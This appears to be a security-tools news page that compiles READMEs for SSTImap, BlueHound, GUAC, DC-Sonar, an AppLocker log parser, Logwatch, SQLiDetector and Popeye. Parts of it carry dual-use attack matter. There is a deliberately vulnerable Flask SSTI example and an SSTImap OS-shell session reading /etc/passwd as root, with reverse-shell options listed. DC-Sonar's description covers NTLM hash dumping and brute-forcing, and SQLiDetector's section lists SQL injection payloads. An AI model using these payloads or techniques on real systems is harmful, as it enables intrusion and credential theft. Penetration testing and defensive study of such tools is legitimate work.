
SSTImap - Automatic SSTI Detection Tool With Interactive Interface


SSTImap is penetration testing software that checks websites for Code Injection and Server-Side Template Injection (SSTI) vulnerabilities and exploits them, giving access to the underlying operating system.

It was developed as an interactive penetration testing tool for SSTI detection and exploitation, which allows for more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added a new payload for Smarty without {php}{/php} enabled. The old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed; check -h for help
  • Code was updated to use newer Python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python 3

Server-Side Template Injection

This is an example of a simple website written in Python using the Flask framework and the Jinja2 template engine. It integrates the user-supplied variable name in an unsafe way: it is concatenated into the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    # SSTI VULNERABILITY:
    template = f"Hello, {name}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

Not only does this way of using templates create an XSS vulnerability, it also allows an attacker to inject template code that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello, John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello, 49!<br>
OS type: posix

User-supplied input should instead be passed safely through the rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    template = "Hello, {{name}}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)
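
With this version, the same probe is treated as data rather than template code, so it is rendered back verbatim (expected behavior, shown here for contrast with the vulnerable example above):

$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello, {{7*7}}!<br>
OS type: posix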

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in many different template engines.

After exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulation.

To check a URL, you can use the -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ β–€β–ˆβ–€
β•‘ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
β•‘ β•šβ•β•β•β•β•£ β•šβ•β•β•β•β•— β•‘ β•‘ β•‘{β•‘ _ __ ___ __ _ _ __
β•šβ•β•β•β•β•— ╠════╗ β•‘ β•‘ β•‘ β•‘*β•‘ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ β•‘ β•‘ β•‘ β•‘}β•‘ | | | | | | (_| | |_) |
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β• β•šβ•β• β•šβ•¦β• |_| |_| |_|\__,_| .__/
β”‚ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bound to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use the --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ β–€β–ˆβ–€
β•‘ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
β•‘ β•šβ•β•β•β•β•£ β•šβ•β•β•β•β•— β•‘ β•‘ β•‘{β•‘ _ __ ___ __ _ _ __
β•šβ•β•β•β•β•— ╠════╗ β•‘ β•‘ β•‘ β•‘*β•‘ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ β•‘ β•‘ β•‘ β•‘}β•‘ | | | | | | (_| | |_) |
β•šβ•β•β•β•β•β•β•©β•β•β•β•β•β•β• β•šβ•β• β•šβ•¦β• |_| |_| |_|\__,_| .__/
β”‚ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use the --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use the -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for the settings.

Some commands are used to alter settings between test runs. To run a test, the target URL must be supplied via the initial -u argument or the url command. After that, you can use the run command to check the URL for SSTI.

If SSTI is found, commands can be used to start exploitation. You get the same exploitation capabilities as in predetermined mode, but you can use Ctrl+C to abort them without stopping the program.

Test results remain valid until the target URL is changed, so you can easily switch between exploitation methods without re-running the detection test every time.

To get a full list of interactive commands, use the help command in interactive mode.
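
A hypothetical session could look like the following (the prompt format and startup message are illustrative; url, run and help are the commands described above, and the confirmation line is taken from the detection output shown earlier):

$ ./sstimap.py -i
...
=> url https://example.com/page?name=John
=> run
...
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
=> help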

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine | RCE | Blind | Code evaluation | File read | File write
Mako | βœ“ | βœ“ | Python | βœ“ | βœ“
Jinja2 | βœ“ | βœ“ | Python | βœ“ | βœ“
Python (code eval) | βœ“ | βœ“ | Python | βœ“ | βœ“
Tornado | βœ“ | βœ“ | Python | βœ“ | βœ“
Nunjucks | βœ“ | βœ“ | JavaScript | βœ“ | βœ“
Pug | βœ“ | βœ“ | JavaScript | βœ“ | βœ“
doT | βœ“ | βœ“ | JavaScript | βœ“ | βœ“
Marko | βœ“ | βœ“ | JavaScript | βœ“ | βœ“
JavaScript (code eval) | βœ“ | βœ“ | JavaScript | βœ“ | βœ“
Dust (<= dustjs-helpers@1.5.0) | βœ“ | βœ“ | JavaScript | βœ“ | βœ“
EJS | βœ“ | βœ“ | JavaScript | βœ“ | βœ“
Ruby (code eval) | βœ“ | βœ“ | Ruby | βœ“ | βœ“
Slim | βœ“ | βœ“ | Ruby | βœ“ | βœ“
ERB | βœ“ | βœ“ | Ruby | βœ“ | βœ“
Smarty (unsecured) | βœ“ | βœ“ | PHP | βœ“ | βœ“
Smarty (secured) | βœ“ | βœ“ | PHP | βœ“ | βœ“
PHP (code eval) | βœ“ | βœ“ | PHP | βœ“ | βœ“
Twig (<=1.19) | βœ“ | βœ“ | PHP | βœ“ | βœ“
Freemarker | βœ“ | βœ“ | Java | βœ“ | βœ“
Velocity | βœ“ | βœ“ | Java | βœ“ | βœ“
Twig (>1.19) | Γ— | Γ— | Γ— | Γ— | Γ—
Dust (> dustjs-helpers@1.5.0) | Γ— | Γ— | Γ— | Γ— | Γ—

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute Python 2. Python 3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, let me know first to avoid duplicating work already in progress by me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


BlueHound - Tool That Helps Blue Teams Pinpoint The Security Issues That Actually Matter


BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.
It is a fork of NeoDash, reimagined to make it suitable for defensive security purposes.

To get started with BlueHound, check out our introductory video, blog post and Nodes22 conference talk.


BlueHound supports presenting your data as tables, graphs, bar charts, line charts, maps and more. It contains a Cypher editor to directly write the Cypher queries that populate the reports. You can save dashboards to your database, and share them with others.

Main Features

  1. Full Automation: The entire cycle of collection, analysis and reporting is basically done with a click of a button.
  2. Community Driven: BlueHound configurations can be exported and imported by others. Sharing of knowledge, best practices, collection methodologies and more is built into the tool itself.
  3. Easy Reporting: Creating customized reports can be done intuitively, without the need to write any code.
  4. Easy Customization: Any custom collection method can be added to BlueHound. Users can add their own custom parameters and even custom icons for their graphs.

Getting Started

ROST ISO

BlueHound can be used as part of the ROST image, which comes pre-configured with everything you need (BlueHound, Neo4j, BloodHound, and a sample dataset).
To load ROST, create a new virtual machine, and install it from the ISO like you would for a new Windows host.

BlueHound Binary

If you already have a Neo4j instance running, you can download a pre-compiled version of BlueHound from our release page. Just download the zip file suitable to your OS version, extract it, and run the binary.

Using BlueHound

  1. Connect to your Neo4j server
  2. Download SharpHound, ShotHound and the Vulnerability Scanner report parser
  3. Use the Data Import section to collect & import data into your Neo4j database.
  4. Once you have data loaded, you can use the Configurations tab to set up the basic information that is used by the queries (e.g. Domain Admins group, crown jewels servers).
  5. Finally, the Queries section can be used to prepare the reports.

BlueHound How-To

Data Collection

The Data Import Tools section can be used to collect data with a click of a button. By default, BlueHound comes preconfigured with SharpHound, ShotHound, and the Vulnerability Scanners script. Additional tools can be added for more data collection. To get started:

  1. Download the relevant tools using the globe icon
  2. Configure the tool path & arguments for each tool
  3. Run the tools

The built-in tools can be configured to automatically upload the results to your Neo4j instance.

Running & Viewing Queries

To get results for a chart, either use the Refresh icon to run a specific query, or use the Query Runner section to run queries in batches. The results are cached even after closing BlueHound, and queries can be run again to get updated results.
Some charts have an Info icon which explains the query and/or provides links to additional information.

Adding & Editing Queries

You can edit the query for new and/or existing charts by using the Settings icon on the top right section of the chart. Here you can use any parameters configured with a Param Select chart, and any Edge Filtering string (see section below).

Edge Filtering

Using the Edge Filtering section, you can filter out specific relationship types for all queries that use the relevant string in their query. For example, ":FILTERED_EDGES" can be used to filter by all the selection filters.
You can also filter by a specific category (see the Info icon) or even define your own custom edge filters.
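
As a rough sketch of the mechanics (an assumption about how such a placeholder could be applied, not BlueHound's actual code), a client could substitute the placeholder with the relationship types left enabled before sending the Cypher query to Neo4j; the neo4j Python driver is used here purely for illustration:

from neo4j import GraphDatabase

# Hypothetical set of relationship types that survived the user's edge filters.
allowed_edges = ["MemberOf", "AdminTo", "HasSession"]

# A report query containing the placeholder string described above.
query = "MATCH p=(u:User)-[:FILTERED_EDGES*1..3]->(g:Group) RETURN p LIMIT 25"
query = query.replace(":FILTERED_EDGES", ":" + "|".join(allowed_edges))

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "secret"))
with driver.session() as session:
    for record in session.run(query):
        print(record["p"])
driver.close()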

Import & Export Config

The Export Config and Import Config sections can be used to save and load your dashboard and configurations as a backup, or even shared between users to collaborate and contribute insightful queries to the security community. Don’t worry, your credentials and data won’t be exported.

Note: any arguments for data import tools are also exported, so make sure you remove any secrets before sharing your configuration.

Settings

The Settings section allows you to set some global limits on query execution – maximum query time and a limit for returned results.

Technical Info

BlueHound is a fork of NeoDash, built with React and use-neo4j. It uses charts to power some of the visualizations. You can also extend NeoDash with your own visualizations. Check out the developer guide in the project repository.

Developer Guide

Run & Build using npm

BlueHound is built with React. You'll need npm installed to run the web app.

Use a recent version of npm and node to build BlueHound. The application has been tested with npm 8.3.1 & node v17.4.0.

To run the application in development mode:

  • clone this repository.
  • open a terminal and navigate to the directory you just cloned.
  • execute npm install to install the necessary dependencies.
  • execute npm run dev to run the app in development mode.
  • the application should be available at http://localhost:3000.

To build the app for production:

  • follow the steps above to clone the repository and install dependencies.
  • execute npm run build. This will create a build folder in your project directory.
  • deploy the contents of the build folder to a web server. You should then be able to run the web app.

Questions / Suggestions

We are always open to ideas, comments, and suggestions regarding future versions of BlueHound, so if you have ideas, don’t hesitate to reach out to us at support@zeronetworks.com or open an issue/pull request on GitHub.



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development. If you are interested in contributing, please look at the contributor guide and the "express interest" issue.

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph databaseβ€”normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the β€œaggregation and synthesis” layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussion on GitHub issues. We also have a public Slack channel on the OpenSSF Slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It is intended for educational purposes only.

Avoid using it on production Active Directory (AD) domains.

No contributor bears any responsibility for any use of it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionality

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register an AD domain for analysis in the app

  • See the status of domain analysis processes

  • Dump and brute-force NTLM hashes from the registered AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list those whose passwords never expire

  • Analyze AD domain accounts by their NTLM password hashes to find accounts and domains where passwords are reused

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and an account with the username "user".

The app will install to /home/user/dc-sonar.

Future releases may provide a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the latest release to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information to create a Django admin user. Provide a username, email address and password.

It will ask twice for information to create a self-signed SSL certificate. Provide the required information.

Open: https://localhost

Enter the Django admin credentials you set during the installation process.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPUs, 2048 MB RAM and a 10 GB disk in VirtualBox, using the Ubuntu Server 22.04 ISO.

If the Ubuntu installer asks to update itself before the VM's installation, agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name | Protocol | Host IP | Host Port | Guest IP | Guest Port
SSH | TCP | 127.0.0.1 | 2222 | 10.0.2.15 | 22
RabbitMQ management console | TCP | 127.0.0.1 | 15672 | 10.0.2.15 | 15672
Django Server | TCP | 127.0.0.1 | 8000 | 10.0.2.15 | 8000
NTLM Scrutinizer | TCP | 127.0.0.1 | 5000 | 10.0.2.15 | 5000
PostgreSQL | TCP | 127.0.0.1 | 25432 | 10.0.2.15 | 5432

Config Windows

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Follow the Windows installation steps for dc-sonar-user-layer.

Follow the Windows installation steps for dc-sonar-workers-layer.

Follow the Windows installation steps for ntlm-scrutinizer.

Follow the Windows installation steps for dc-sonar-frontend.

Set shared folders

Follow the steps from "Open VirtualBox" to "Reboot VM", but add shared folders to the VM in VirtualBox with the "Auto-mount" option enabled.

After reboot, run command:

sudo adduser $USER vboxsf

Log out and log back in with that user account.

In the /home/user directory, you can use the mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL on Ubuntu 20.04:

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the following lines to allow connections from the host machine to PostgreSQL, save the changes and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change the parameters specified below, save the changes and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if it is needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to the created databases from Windows, using the admin account and a client such as DBeaver.

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open management UI on http://localhost:15672/.

Install Python3.10

Ensure that your system is updated and the required packages installed:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then proceed and add the deadsnakes PPA to the APT package manager sources list as below:

sudo add-apt-repository ppa:deadsnakes/ppa

Install Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the installed Python version:

python3.10 --version

Output:
Python 3.10.5

Hosts

Add the IP addresses of the Domain Controllers to /etc/hosts:

sudo nano /etc/hosts

Layers

Set venv

We have to create the venv one level above, as VirtualBox doesn't allow creating it inside shared folders.

Go to the home directory where the shared folders are located:

cd /home/user
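
For example, a venv for one of the layers can be created like this (an illustrative command and name; the exact steps are documented in each layer's repository):

python3.10 -m venv venv-dc-sonar-user-layer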

Follow the deploy steps for dc-sonar-user-layer on Ubuntu.

Follow the deploy steps for dc-sonar-workers-layer on Ubuntu.

Follow the deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Follow the config steps for dc-sonar-user-layer on Ubuntu.

Follow the config steps for dc-sonar-workers-layer on Ubuntu.

Follow the config steps for ntlm-scrutinizer on Ubuntu.

Run

Follow the run steps for ntlm-scrutinizer on Ubuntu.

Follow the run steps for dc-sonar-user-layer on Ubuntu.

Follow the run steps for dc-sonar-workers-layer on Ubuntu.

Follow the run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and accept the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and log in as the Django user created earlier.



Get-AppLockerEventlog - Script For Fetching Applocker Event Log By Parsing The Win-Event Log


This script parses all the event channels of the Windows event log to extract all the logs related to AppLocker. It gathers all the important pieces of information about those events for forensic or threat-hunting purposes, or even for troubleshooting. Here are the logs we fetch from the Windows event log:

  • EXE and DLL,
  • MSI and Script,
  • Packaged app-Deployment,
  • Packaged app-Execution.

The output:

  • The result will be displayed on the screen

  • The result will also be saved to a CSV file: AppLocker-log.csv

The juicy and useful information you will get with this script includes:

  • FileType,
  • EventID,
  • Message,
  • User,
  • Computer,
  • EventTime,
  • FilePath,
  • Publisher,
  • FileHash,
  • Package
  • RuleName,
  • LogName,
  • TargetUser.

PARAMETERS

HunType

This parameter specifies the type of events you are interested in. There are four possible values:

1. All

This gets all the events of AppLocker that are interesting for threat-hunting, forensic or even troubleshooting. This is the default value.

.\Get-AppLockerEventlog.ps1 -HunType All

2. Block

This gets all the events that are triggered by AppLocker blocking an application. This type is critical for threat hunting or forensics and comes with high priority, since it indicates malicious attempts, or can be a good indicator of prior malicious activity trying to evade defensive mechanisms.

.\Get-AppLockerEventlog.ps1 -HunType Block |Format-Table -AutoSize

3. Allow

This gets all the events that are triggered by the action of Allowing an application by AppLocker. For threat-hunting or forensics, even the allowed applications should be monitored, in order to detect any possible bypass or configuration mistakes.

.\Get-AppLockerEventlog.ps1 -HunType Allow | Format-Table -AutoSize

4. Audit

This gets all the events generated when AppLocker would have blocked the application if the enforcement mode were enabled (Audit mode). For threat hunting or forensics, this could indicate a configuration mistake, neglect by the admin to switch the mode, or even a malicious action that happened during the audit (tuning) phase.

 .\Get-AppLockerEventlog.ps1 -HunType Audit

Resource

To better understand AppLocker:

Contributing

This project welcomes contributions and suggestions.



Logwatch 7.8

Logwatch analyzes and reports on Unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and produce a customizable report. It should work right out of the package on most systems.

SQLiDetector - Helps You To Detect SQL Injection "Error Based" By Sending Multiple Requests With 14 Payloads And Checking For 152 Regex Patterns For Different Databases


A simple Python script, supported by a BurpBounty profile, that helps you detect error-based SQL injection by sending multiple requests with 14 payloads and checking for 152 regex patterns for different databases.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
| S|Q|L|i| |D|e|t|e|c|t|o|r|
| Coded By: Eslam Akl @eslam3kll & Khaled Nassar @knassar702
| Version: 1.0.0
| Blog: eslam3kl.medium.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Description

The main idea of the tool is to scan for error-based SQL injection by using different payloads like:

'123
''123
`123
")123
"))123
`)123
`))123
'))123
')123"123
[]123
""123
'"123
"'123
\123

And matching the responses against 152 error regex patterns for different databases.
Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml
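
As a minimal illustration of the idea (a sketch, not the tool's actual code; the patterns shown are a tiny paraphrased subset of the 152), appending a payload to a URL and grepping the response for database error signatures looks like this:

import re
import requests

# Tiny illustrative subset of error signatures; the real tool checks
# 152 regex patterns taken from sqlmap's errors.xml.
ERROR_PATTERNS = [
    r"SQL syntax.*?MySQL",   # MySQL
    r"PostgreSQL.*?ERROR",   # PostgreSQL
    r"ORA-\d{5}",            # Oracle
]

def looks_injectable(url, payload="'123"):
    """Append the payload to the URL and look for DB error strings."""
    response = requests.get(url + payload, timeout=10)
    return any(re.search(p, response.text, re.I) for p in ERROR_PATTERNS)

print(looks_injectable("http://testphp.vulnweb.com/artists.php?artist=1"))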

How does it work?

It's very simple; just organize your steps as follows:

  1. Use your subdomain grabber script or tools.
  2. Pass all collected subdomains to httpx or httprobe to get only live subs.
  3. Use your links and URLs tools to grab all waybackurls like waybackurls, gau, gauplus, etc.
  4. Use URO tool to filter them and reduce the noise.
  5. Grep to get all the links that contain parameters only. You can use Grep or GF tool.
  6. Pass the final URLs file to the tool, and it will test them.

The final form of the URLs that you pass to the tool must be like these:

https://aykalam.com?x=test&y=fortest
http://test.com?parameter=ayhaga

Installation and Usage

Just run the following command to install the required libraries.

~/eslam3kl/SQLiDetector# pip3 install -r requirements.txt 

To run the tool itself.

# cat urls.txt
http://testphp.vulnweb.com/artists.php?artist=1

# python3 sqlidetector.py -h
usage: sqlidetector.py [-h] -f FILE [-w WORKERS] [-p PROXY] [-t TIMEOUT] [-o OUTPUT]
A simple tool to detect SQL errors
optional arguments:
-h, --help            show this help message and exit
-f FILE, --file FILE  File of the urls
-w WORKERS, --workers WORKERS  Number of threads
-p PROXY, --proxy PROXY  Proxy host
-t TIMEOUT, --timeout TIMEOUT  Connection timeout
-o OUTPUT, --output OUTPUT  Output file

# python3 sqlidetector.py -f urls.txt -w 50 -o output.txt -t 10

BurpBounty Module

I've created a BurpBounty profile that uses the same payloads and injects them at multiple positions, like:

  • Parameter name
  • Parameter value
  • Headers
  • Paths

I think it's more effective, and it will be helpful for POST requests, which you can't test using the Python script.

How does it test the parameter?

What's the difference between this tool and any other one? If we have a link like https://example.com?file=aykalam&username=eslam3kl, we have 2 parameters, so the tool creates 2 possible vulnerable URLs (see the sketch below).

  1. For every payload, it will generate URLs like the following:
https://example.com?file=123'&username=eslam3kl
https://example.com?file=aykalam&username=123'
  2. It will send a request for every link and check whether one of the patterns matches using regex.
  3. For any vulnerable link, it will save it in a separate file for every process.
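
A short sketch of that per-parameter mutation using only the standard library (a hypothetical helper, not the tool's code):

from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

def mutate(url, payload):
    """Yield one URL per parameter, injecting the payload into that value."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (key, _) in enumerate(params):
        mutated = list(params)
        mutated[i] = (key, "123" + payload)
        yield urlunsplit(parts._replace(query=urlencode(mutated)))

for u in mutate("https://example.com?file=aykalam&username=eslam3kl", "'"):
    print(u)  # the quote is percent-encoded as %27 on the wire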

Upcoming updates

  • Output json option.
  • Adding proxy option.
  • Adding threads to increase the speed.
  • Adding progress bar.
  • Adding more payloads.
  • Adding BurpBounty Profile.
  • Inject the payloads in the parameter name itself.

If you want to contribute, feel free to do that. You're welcome :)

Thanks to

Thanks to Mohamed El-Khayat and Orwa for the amazing payloads and ideas. Follow them and you will learn more:

https://twitter.com/Mohamed87Khayat
https://twitter.com/GodfatherOrwa

Stay in touch <3

LinkedIn | Blog | Twitter



Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

